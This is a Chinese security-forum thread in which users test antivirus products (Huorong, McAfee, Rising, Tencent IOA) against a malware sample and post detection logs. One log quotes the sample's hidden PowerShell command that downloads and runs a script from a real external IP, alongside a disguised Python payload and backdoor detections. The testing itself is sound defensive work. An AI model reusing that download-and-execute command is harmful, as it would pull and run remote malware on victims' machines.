#Grimresource #Downloader #MSC #FakeAPP（7.16）

hsks

群里面在测腾讯的IOA（企业杀软）

00006666

hsks 发表于 2024-7-16 20:08
群里面在测腾讯的IOA（企业杀软）

有EDR还不错，主要是很多大厂的EDR连试用都要企业才能申请，几乎拿不到，然后就没人测，像奇安信那种，要跟客服联系才能拿到试用EDR

hsks

00006666 发表于 2024-7-16 20:12
有EDR还不错，主要是大厂的EDR连试用都要企业才能申请，几乎拿不到，然后就没人测，像奇安信那种，要跟客 ...

好是好，但是（
可能是15天试用的原因（

00006666

hsks 发表于 2024-7-16 20:14
好是好，但是（
可能是15天试用的原因（

你们能申请到IOA试用，应该也能申请到奇安信，可以试试

https://sn.eps.qianxin.com/edrpro/home

hsks

00006666 发表于 2024-7-16 20:18
你们能申请到IOA试用，应该也能申请到奇安信，可以试试

https://sn.eps.qianxin.com/edrpro/hom ...

不太可能，你能信申请IOA的人还是未成年吗（

算是，骗过来的（

aboringman

火绒6.0：

双击正常流程（火绒拦截部分）

1. 防护项目：隐藏执行PowerShell
   
2. 执行文件：C:\Users\Public\Music\tt.exe
   
3. 执行命令行：C:\Users\Public\Music\tt.exe  -nop -w hidden -c IEX((new-object net.webclient).downloadstring('http://103.94.78.35/ps1.txt'))
   
4. 操作结果：已允许
   
5. 进程ID：9836
   
6. 操作进程：C:\Windows\System32\cmd.exe
   
7. 操作进程命令行：cmd /c ren C:\Users\Public\Music\Wd\W.exe Wd.exe&start /MIN C:\Users\Public\Music\tt.exe -nop -w hidden -c IEX((new-object net.webclient).downloadstring('http://103.94.78.35/ps1.txt'))
   
8. 父进程ID：9812
   
9. 父进程：C:\Windows\System32\conhost.exe
   
10. 父进程命令行："C:\Windows\System32\conhost.exe" cmd /c ren C:\Users\Public\Music\Wd\W.exe Wd.exe&start /MIN C:\Users\Public\Music\tt.exe -nop -w hidden -c "IEX((new-object net.webclient).downloadstring('http://103.94.78.35/ps1.txt'))"
    
11. 
    
12. 病毒名称：Trojan/PS.Rozena.a
    
13. 病毒ID：3C05315EDF9DFAB5
    
14. 病毒路径：PowerShell_0E1AE092A98885A9182CC41EFC3BED9895A6C6EA
    
15. 操作类型：执行
    
16. 操作结果：已处理，清除恶意代码
    
17. 
    
18. 进程ID：10148
    
19. 操作进程：C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    
20. 操作进程命令行："c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    
21. 父进程ID：9880
    
22. 父进程：C:\Users\Public\Music\tt.exe

复制代码

扫描公用音乐文件夹



直接双击Wd.exe

1. 病毒名称：Backdoor/Lotok.fs
   
2. 病毒ID：C284CCDE13F78515
   
3. 虚拟地址：0x0000000000400000
   
4. 映像大小：136KB
   
5. 是否完整映像：否
   
6. 数据流哈希：c0c75f95
   
7. 操作结果：已处理
   
8. 进程ID：6164
   
9. 操作进程：C:\Users\Public\Music\python\pythonw.exe
   
10. 操作进程命令行：C:\Users\Public\Music\python\pythonw.exe  C:\Users\Public\Music\python\Code.jpg
    
11. 父进程ID：6056
    
12. 父进程：C:\Windows\SysWOW64\cmd.exe
    
13. 父进程命令行：C:\Windows\system32\cmd.exe /c start C:\Users\Public\Music\python\pythonw.exe C:\Users\Public\Music\python\Code.jpg

复制代码

hsks

aboringman 发表于 2024-7-16 20:22
火绒6.0：

双击正常流程（火绒拦截部分）

笑点解析，个人杀软打过了企业杀软（

能查吗，能查，能处置吗，不能（

Nocria

hansyu

McAfee 双击，嗯……杀了powershell……

1. {"timestamp":"2024-07-16T14:03:38.948Z","target_name":"[memory] id: 700000000Ob:0, size: 478 bytes, app: 'PowerShell_C:\\Users\\Public\\Music\\tt.exe_10.0.19041.546', backing file: ''","initiator_name":"PowerShell_C:\\Users\\Public\\Music\\tt.exe_10.0.19041.546","sensor":"IAntiMalware","target_hash":"","target_url":"","detection_name":"Real Protect-PSFL!A84FD1AA0294","final_result":"infected","all":[{"final_detection_source":"rp-fileless","file_rep":0,"hti_rep":1,"url_rep":0,"cert_rep":[]},{"detection_source":"cache","file_rep":0,"hti_rep":0,"url_rep":0,"cert_rep":[]},{"detection_source":"signature","file_rep":0,"hti_rep":0,"url_rep":0,"cert_rep":[]},{"detection_source":"rp-fileless","file_rep":0,"hti_rep":1,"url_rep":0,"cert_rep":[]},{"detection_source":"av","file_rep":0,"hti_rep":50,"url_rep":0,"cert_rep":[]},{"detection_source":"neo","file_rep":0,"hti_rep":50,"url_rep":0,"cert_rep":[]}]}
   

复制代码

yaokai815

瑞星miss